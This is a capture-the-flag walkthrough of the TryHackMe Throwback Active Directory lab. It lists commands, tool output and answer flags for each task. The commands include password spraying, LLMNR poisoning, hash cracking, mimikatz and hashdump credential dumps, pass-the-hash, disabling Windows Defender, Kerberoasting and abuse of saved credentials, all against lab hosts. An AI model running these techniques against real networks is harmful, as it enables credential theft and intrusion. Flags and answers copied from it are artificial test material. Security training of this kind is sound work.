Throwback - [THM]

Marmeus

Introduction

In this post I show the commands, links or files you need to use in order to gather the information required to answer all the questions in the Throwback lab.

Note: The flags change dynamically so do not bother copying and pasting my flags.

Throwback Network

Task 7 - Entering the Breach

kali@kali:~/Documents/THM/Throwback$ nmap -sV -sC -p- -v --min-rate 1000 -oN NetworkScan.txt 10.200.179.0/24  
Nmap scan report for 10.200.179.138
Host is up (0.046s latency).
Not shown: 65531 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
53/tcp  open  domain   (generic dns response: REFUSED)
80/tcp  open  http     nginx
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.200.179.138/
443/tcp open  ssl/http nginx
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-title: pfSense - Login
| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Subject Alternative Name: DNS:pfSense-5f099cf870c18
| Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-11T11:05:28
| Not valid after:  2021-08-13T11:05:28
| MD5:   fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
|_SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.91%I=7%D=12/29%Time=61CC761E%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");

Nmap scan report for 10.200.179.219
Host is up (0.046s latency).
Not shown: 65524 filtered ports
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
|   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
|_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Throwback Hacks
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THROWBACK
|   NetBIOS_Domain_Name: THROWBACK
|   NetBIOS_Computer_Name: THROWBACK-PROD
|   DNS_Domain_Name: THROWBACK.local
|   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
|   DNS_Tree_Name: THROWBACK.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-12-29T14:53:02+00:00
| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
| Issuer: commonName=THROWBACK-PROD.THROWBACK.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-27T01:03:16
| Not valid after:  2022-06-28T01:03:16
| MD5:   f469 5c2b e0d2 e866 9f43 e7f1 f342 453e
|_SHA-1: 6924 2ba7 f824 740f 9998 023d 91c4 563e 4e72 5622
|_ssl-date: 2021-12-29T14:54:30+00:00; 0s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-29T14:53:01
|_  start_date: N/A

Nmap scan report for 10.200.179.232
Host is up (0.048s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4e:ef:ef:e7:60:94:87:99:d7:e1:ac:31:a1:04:04:36 (RSA)
|   256 ac:cc:f1:cd:d4:03:cb:63:2c:56:80:30:66:26:ad:77 (ECDSA)
|_  256 f4:dc:9d:b9:54:4a:e5:72:b9:40:19:f1:c5:75:ac:9b (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 2D267521ED544C817FADA219E66C0CCC
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Throwback Hacks - Login
|_Requested resource was src/login.php
143/tcp open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: OK have IDLE post-login LOGIN-REFERRALS LOGINDISABLEDA0001 more capabilities ENABLE IMAP4rev1 listed ID SASL-IR LITERAL+ Pre-login STARTTLS
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-25T15:51:57
| Not valid after:  2030-07-23T15:51:57
| MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
|_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: listed IDLE have LOGIN-REFERRALS post-login more capabilities ENABLE SASL-IR AUTH=PLAINA0001 ID OK IMAP4rev1 Pre-login LITERAL+
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-25T15:51:57
| Not valid after:  2030-07-23T15:51:57
| MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
|_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.200.179.250
Host is up (0.046s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bb:e5:c5:44:5c:ca:12:47:80:fc:35:6a:a8:30:12:e4 (RSA)
|   256 b5:cc:d4:cd:0e:57:56:49:95:e5:fc:fc:17:74:0c:68 (ECDSA)
|_  256 17:c6:0a:3d:e3:98:21:63:bf:2c:a4:f5:db:c1:00:53 (ED25519)
1337/tcp open  http    Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • 10.200.XXX.138 -> THROWBACK-FW01: pfSense firewall (SSH, DNS, HTTP/HTTPS)
  • 10.200.XXX.219 -> THROWBACK-PROD: Windows host (IIS, SMB, RDP, WinRM), domain THROWBACK.local
  • 10.200.XXX.232 -> THROWBACK-MAIL: Linux mail server (Apache webmail, Dovecot IMAP)
  • 10.200.XXX.250 -> Linux host with a Node.js Express app on 1337 (not named by the lab at this point)

What is the domain name?

THROWBACK.local

What is the HTTP title of the web server running on THROWBACK-PROD?

Throwback Hacks

How many ports are open on THROWBACK-MAIL?

4

What service is running on THROWBACK-FW01?

pfSense

What version of Apache is running on THROWBACK-MAIL?

Apache/2.4.29

Task 8 - Exploring the Caverns

Who is the CEO of Throwback Hacks?

http://10.200.XXX.219/#team -> Summers Winters

Where is the company located?

http://10.200.XXX.219/#contact -> Great Britain

What is the guest username on the mail server?

http://10.200.XXX.232/src/login.php -> tbhguest

What is the guest password on the mail server?

http://10.200.XXX.232/src/login.php -> WelcomeTBH1!

What flag is found within the guest inbox?

TBH{ede543c628d365ab772078b0f6880677}

What flag is found in the guest contacts page?

TBH{4060a70860f0a1648e5a991de1739888}

Task 9 - Web Shells and You!

Source: Link

What username was used to access the configuration portal?

admin

What password was used to access the configuration portal?

pfsense

What menu tab contains a command prompt tab in the PFSense Configuration panel?

Diagnostics / Command Prompt

Task 10 - First Contact

What log file was found that is not a default log?

cat /var/log/login.log 
Last Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364

What user was found within the log?

HumphreyW

What is the hash of the user?

1c13639dba96c7b53d26f7d00956a364 (an NT hash; it cracks to securitycenter in Task 14)

What is the root flag on THROWBACK-FW01?

cat /root/root.txt
TBH{b6f17a9c06e75ea4a09b79e8d89f9749}

What is the log flag on THROWBACK-FW01?

/var/log/flag.txt
TBH{c9cf8b688a9b8677a4546781527e4484}

Task 11 - Wait, you mean just one this time?

POST /src/redirect.php HTTP/1.1
Host: 10.200.179.232
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://10.200.179.232
Connection: close
Referer: http://10.200.179.232/src/login.php
Cookie: SQMSESSID=on1cj6suhl1ebvv8ha7pq0mm41
Upgrade-Insecure-Requests: 1


login_username=tbhguest&secretkey=WelcomeTBH1%21&js_autodetect_results=1&just_logged_in=1

Command:

kali@kali:~/Documents/THM/Throwback$ cat users.txt 
tbhguest
HumphreyW
SummersW
FoxxR
noreply
DaibaN
PeanutbutterM
PetersJ
DaviesJ
BlaireJ
GongoH
MurphyF
JeffersD
HorsemanB

kali@kali:~/Documents/THM/Throwback$ cat weakPasswords.txt 
WelcomeTBH1!
securitycenter
Summer2020
Fall2020
Winter2020
Autumn2020
Summer2019
Fall2019
Winter2019
Autumn2019
Summer2018
Fall2018
Winter2018
Autumn2018
Management2020
Management2019
Management2018
Password2020
Password2019
Password2018
TBHSecurity2020
TBHSecurity2018
TBHSecurity2019
Throwback2020
Throwback2019
Throwback2018
Password123

kali@kali:~/Documents/THM/Throwback$ hydra -L users.txt -P weakPasswords.txt 10.200.179.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=incorrect' 
[80][http-post-form] host: 10.200.179.232   login: tbhguest   password: WelcomeTBH1!
[80][http-post-form] host: 10.200.179.232   login: HumphreyW   password: securitycenter
[STATUS] 89.00 tries/min, 89 tries in 00:01h, 191 to do in 00:03h, 16 active
[80][http-post-form] host: 10.200.179.232   login: PeanutbutterM   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: DaviesJ   password: Management2018
[STATUS] 64.67 tries/min, 194 tries in 00:03h, 86 to do in 00:02h, 16 active
[80][http-post-form] host: 10.200.179.232   login: GongoH   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: MurphyF   password: Summer2020
[80][http-post-form] host: 10.200.179.232   login: JeffersD   password: Summer2020

What is the username parameter in the POST request?

login_username

What is the password parameter in the POST request?

secretkey

What username found with hydra starts with an M?

MurphyF

What is the password found with hydra?

Summer2020

Task 12 - Gone Phishing

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: THROWBACK-WS01\BlaireJ

meterpreter > sysinfo
Computer        : THROWBACK-WS01
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : THROWBACK
Logged On Users : 10
Meterpreter     : x86/windows

What User was compromised via Phishing?

BlaireJ

What Machine was compromised during Phishing?

THROWBACK-WS01

What is the root flag on THROWBACK-WS01?

meterpreter > cat C:\\Users\\BlaireJ\\Desktop\\root.txt
TBH{9c5e361a2368723e042924180be7c958}

What is the user flag on THROWBACK-WS01?

meterpreter > cat C:\\Users\\humphreyw\\Desktop\\user.txt
TBH{813e2c2709ceb02041891acaec55121d}

Task 13 - Just a Drop Will Do

Responder answers LLMNR/NBT-NS name lookups on tun0 and records the NetNTLMv2 exchange of any client that then tries to authenticate to it:

kali@kali:~/Documents/THM/Throwback$ sudo responder -I tun0 -rdw -v

[SMB] NTLMv2-SSP Client   : 10.200.179.219
[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:2f71c71c129872db:C2C361B7F2729FF632B3E0174EAA9CA8:010100000000000000647150A9FCD70162AD743085ED01C400000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000
[SMB] NTLMv2-SSP Client   : 10.200.179.219
[SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
[SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:d18b1b179c6b5da6:8E585648F1086DB4DD79D6B4CA92388A:010100000000000000647150A9FCD701B4D13C91B3AFE5B500000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000

What User fell victim to LLMNR Poisoning?

PetersJ

What is the 4th octet of the IP Address the LLMNR request came from?

219

What is the hostname of the device?

THROWBACK-PROD

Task 14 - We Will, We Will, Rockyou

What is the cracked password from the pfSense hash?

kali@kali:~/Documents/THM/Throwback$ john -w=/usr/share/wordlists/rockyou.txt --format=NT pfsense_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
securitycenter   (?)
1g 0:00:00:00 DONE (2021-12-29 11:57) 1.351g/s 1078Kp/s 1078Kc/s 1078KC/s seesaw22..sebial
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

What is the cracked password from LLMNR poisoning?

kali@kali:~/Documents/THM/Throwback$ hashcat -m 5600 -r /opt/OneRuleToRuleThemAll.rule  responder_hashes.txt /usr/share/wordlists/rockyou.txt 
PETERSJ::THROWBACK:d18b1b179c6b5da6:8e585648f1086db4dd79d6b4ca92388a:[...]:Throwback317

Task 18 - SEATBELT CHECK!

====== CredEnum ======
  Target              : localadmin.pass
  UserName            : admin-petersj
  Password            : 
  CredentialType      : DomainPassword
  PersistenceType     : Enterprise
  LastWriteTime       : 8/25/2020 2:52:57 AM

What user was found from seatbelt?

admin-petersj

Submit flag for THROWBACK-PROD in Task 4

Seatbelt's CredEnum output shows that petersj has a saved credential (target localadmin.pass) for admin-petersj. Running the following command in an RDP session as petersj reuses that stored credential, so runas never prompts for a password, and the resulting shell runs as admin-petersj; from it all the flags on the machine can be read.

C:\Users\petersj\Documents>runas /savecred /user:admin-petersj /profile "cmd.exe"

What is the flag from the poisoned user on THROWBACK-PROD?

C:\User>type C:\\Users\\petersj\\Desktop\\user.txt
TBH{277c5929d176569338ce0cff02f328c0}

What is the second user flag on THROWBACK-PROD?

C:\User>type C:\\Users\\blairej.THROWBACK\\Desktop\\user.txt
TBH{9b56df4dc5cbda864a246ebfe4964d6c}

What is the root flag on THROWBACK-PROD?

PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
TBH{4d6945c0b80283b875fc7c3a5a057da6}

Task 20 - Not the soft and fluffy kind

The same saved credential launches an Empire stager as admin-petersj:

runas /savecred /user:admin-petersj /profile "C:\\Users\\petersj\\Documents\\launcher.bat"

In the resulting Empire agent, run the module powershell/credentials/mimikatz/command with its Command option set to:

privilege::debug sekurlsa::logonpasswords
Authentication Id : 0 ; 182634 (00000000:0002c96a)
Session           : Batch from 0
User Name         : BlaireJ
Domain            : THROWBACK
Logon Server      : THROWBACK-DC01
Logon Time        : 12/29/2021 8:50:13 PM
SID               : S-1-5-21-3906589501-690843102-3982269896-1116
	msv :	
	 [00000003] Primary
	 * Username : BlaireJ
	 * Domain   : THROWBACK
	 * NTLM     : c374ecb7c2ccac1df3a82bce4f80bb5b
	 * SHA1     : 6522277853426f24275c4c0b0381458ef452e640
	 * DPAPI    : db241bce607cacb4b04d032e25071f0f
	tspkg :	
	wdigest :	
	 * Username : BlaireJ
	 * Domain   : THROWBACK
	 * Password : (null)
	kerberos :	
	 * Username : BlaireJ
	 * Domain   : THROWBACK.LOCAL
	 * Password : 7eQgx6YzxgG3vC45t5k9
	ssp :	
	credman :	
	
Authentication Id : 0 ; 77225 (00000000:00012da9)
Session           : Batch from 0
User Name         : Administrator
Domain            : THROWBACK-PROD
Logon Server      : THROWBACK-PROD
Logon Time        : 12/29/2021 8:50:00 PM
SID               : S-1-5-21-1142397155-17714838-1651365392-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * NTLM     : a06e58d15a2585235d18598788b8147a
	 * SHA1     : 4e40938facb10fb6aa244240301b791a0454f328
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : THROWBACK-PROD
	 * Password : (null)	

What domain user was logged in?

BlaireJ

What is the user's hash?

c374ecb7c2ccac1df3a82bce4f80bb5b

What is the administrator's NTLM hash?

a06e58d15a2585235d18598788b8147a

Task 22 - Good Intentions, Courtesy of Microsoft

┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
└─# proxychains crackmapexec smb 10.200.179.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>/dev/null | grep \+
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:445 <--socket error or timeout!
 ...  OK                                                                                                                                                      
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b   

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ proxychains crackmapexec smb 10.200.179.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364 2>/dev/null | grep \+
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.176  445    THROWBACK-TIME   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364

Task 23 - Wallace and Gromit

Windows Defender's real-time protection would quarantine SharpHound.ps1 as soon as it is uploaded, so it is switched off first; this is possible because BlaireJ is a member of the local Administrators group on THROWBACK-WS01. (Disabling it is noisy and logged, so on a real engagement a loader that evades AMSI/AV is the quieter option.)

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains ssh "blairej"@10.200.179.222
throwback/blairej@10.200.179.222's password: 7eQgx6YzxgG3vC45t5k9

blairej@THROWBACK-WS01 C:\Users\BlaireJ> net user BlaireJ  
[...]                  
Local Group Memberships      *Administrators         
Global Group memberships     *None 
blairej@THROWBACK-WS01 C:\Users\BlaireJ>powershell -c "Set-MpPreference -DisableRealTimeMonitoring $true"

With real-time protection off, upload SharpHound.ps1 (scp through the same proxychains SSH tunnel works), dot-source it in a PowerShell session so that Invoke-BloodHound is defined, and run the collector:

PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip
------------------------------------------------
Initializing SharpHound at 3:26 PM on 12/29/2021
------------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 151 objects finished (+151 15.1)/s -- Using 97 MB RAM
Enumeration finished in 00:00:10.5925838
Compressing data to C:\Users\BlaireJ\20211229152617_loot.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:28 PM on 12/29/2021! Happy Graphing!

PS C:\Users\BlaireJ> dir


    Directory: C:\Users\BlaireJ


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         6/28/2020   3:31 PM                3D Objects
d-r---         6/28/2020   3:31 PM                Contacts
d-r---         8/25/2020   3:43 PM                Desktop
d-r---         6/28/2020   3:31 PM                Documents
d-r---         7/27/2020   8:39 AM                Downloads
d-r---         6/28/2020   3:31 PM                Favorites
d-r---         6/28/2020   3:31 PM                Links
d-r---         6/28/2020   3:31 PM                Music
d-r---          8/9/2020  10:25 AM                OneDrive
d-r---         6/28/2020   3:33 PM                Pictures
d-r---         6/28/2020   3:31 PM                Saved Games
d-r---         6/28/2020   3:33 PM                Searches
d-r---         7/14/2020  11:47 AM                Videos
-a----        12/29/2021   3:28 PM          15330 20211229152617_loot.zip

kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains scp "blairej"@10.200.179.222:20211229152617_loot.zip .
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:22  ...  OK
blairej@10.200.179.222's password: 
20211229152617_loot.zip 

What service account is kerberoastable?

In BloodHound, run the built-in query "List all Kerberoastable Accounts".

SQLSERVICE

What domain does the trust connect to?

In BloodHound, run the built-in query "Map Domain Trusts".

corporate.local

What normal user account is a domain admin?

In BloodHound, run the built-in query "Find all Domain Admins".

Mercerh

Task 24 - With three heads you'd think they'd at least agree once

┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
└─# proxychains GetUserSPNs.py -dc-ip 10.200.179.117 "THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9" -request
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:389  ...  OK
ServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation 
-------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------
TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 11:20:08.552650  2020-07-27 11:26:43.628665             



[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
$krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$ebd1055f628adf4dda15bbc00ae27ea7$[...]

Cracking the hash.

kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 -a 0 sqlservice_ticket.txt /usr/share/wordlists/rockyou.txt 
[...]:mysql337570

What account was compromised by kerberoasting?

SQLService

What password was cracked from the retrieved ticket?

mysql337570

Task 25 - You're Five Minutes Late...

Add a hosts entry so the Timekeep site can be reached by name:

echo "10.200.179.176 timekeep.throwback.local" | sudo tee -a /etc/hosts

What is the hostname of the device?

THROWBACK-TIME

What is the title of the web page?

Throwback Hacks Timekeep

What user was the password reset for?

murphyf

What is the password reset flag on THROWBACK-TIME?

The /dev/passwordreset.php endpoint sets the given user's password from an unauthenticated GET request (PASSWORD is whatever you choose):

kali@kali:~/Documents/THM/Throwback$ sudo proxychains curl "http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.176:80  ...  OK
Password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}

Task 26 - Word to your Mother

What web server accepts XLSMs as a file upload?

THROWBACK-TIME

What page is the file upload in?

timesheet.php

What is the name of the XLSMs that you can upload?

Timesheet.xlsm

Task 27 - Meterpreter session 1 closed. Reason: World-Domination

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::
Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::

kali@kali:~/Documents/THM/Throwback$ cat timekeeper_hash.txt 
901682b1433fdf0b04ef42b13e343486
kali@kali:~/Documents/THM/Throwback$ hashcat -m 1000 -a 0 timekeeper_hash.txt  /usr/share/wordlists/rockyou.txt 
901682b1433fdf0b04ef42b13e343486:keeperoftime  

Which user's hashes were we able to dump?

Timekeeper

What is the user's hash starting from the third colon?

901682b1433fdf0b04ef42b13e343486

What is the administrator's hash starting from the third colon?

43d73c6a52e8626eabc5eb77148dca0b

What is the user's cracked password?

keeperoftime

Task 28 - We gotta drop the load!

kali@kali:~/Documents/THM/Throwback$ proxychains ssh Timekeeper@10.200.179.176
Timekeeper@10.200.179.176's password: keeperoftime

The MariaDB root password is the one recovered by Kerberoasting SQLService (mysql337570), reused between the service account and the database:

timekeeper@THROWBACK-TIME C:\xampp\mysql\bin>mysql.exe -u root -p
Enter password: mysql337570
MariaDB [(none)]> show databases; 
+--------------------+ 
| Database           |
+--------------------+
| domain_users       |
| information_schema |
| mysql              |
| performance_schema |
| pets               |
| phpmyadmin         |
| test               |
| timekeepusers      |
+--------------------+
MariaDB [(none)]> use domain_users; show tables; 
Database changed        
+------------------------+
| Tables_in_domain_users |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.000 sec)
MariaDB [domain_users]> select * from users; 
+----------------------+  
| name                 |
+----------------------+
| ClemonsD             |
| DunlopM              |
| LoganF               | 
| IbarraA              |               
| YatesZ               |                                                       
| CopelandS            |
| MckeeE               |  
| HeatonC              |  
| FlowersK             |  
| HardinA              |  
| BurrowsA             |  
| FinneganI            |
| GalindoI             |               
| LyonsC               |                                                       
| FullerS              |                                                         
| SteeleJ              |       
| WangG                |                                                       
| LoweryR              |                                                       
| JeffersD             |                                                       
| GreigH               |                                                       
| SharpK               |                                                       
| KruegerM             |                                                       
| ChenI                |
| VillanuevaD          |               
| BegumK               |                                                       
| TBH{ac3f61048236fd39 |                                                             
| 8da9e2289622157e}    |        
+----------------------+

What database are the timekeep login users located?

timekeepusers

What database are the domain users located in?

domain_users

What table was located in the domain users database?

users

What is the first username in the table?

ClemonsD

What is the root flag on THROWBACK-TIME?

Using the same Meterpreter session as for the hash dump:

meterpreter > cat C:\\Users\\Administrator\\Desktop\\root.txt
TBH{2898c692926188884bf508efe560588f}

What is the SQL flag on THROWBACK-TIME?

TBH{ac3f61048236fd398da9e2289622157e}

Task 29 - So we're doing this again...

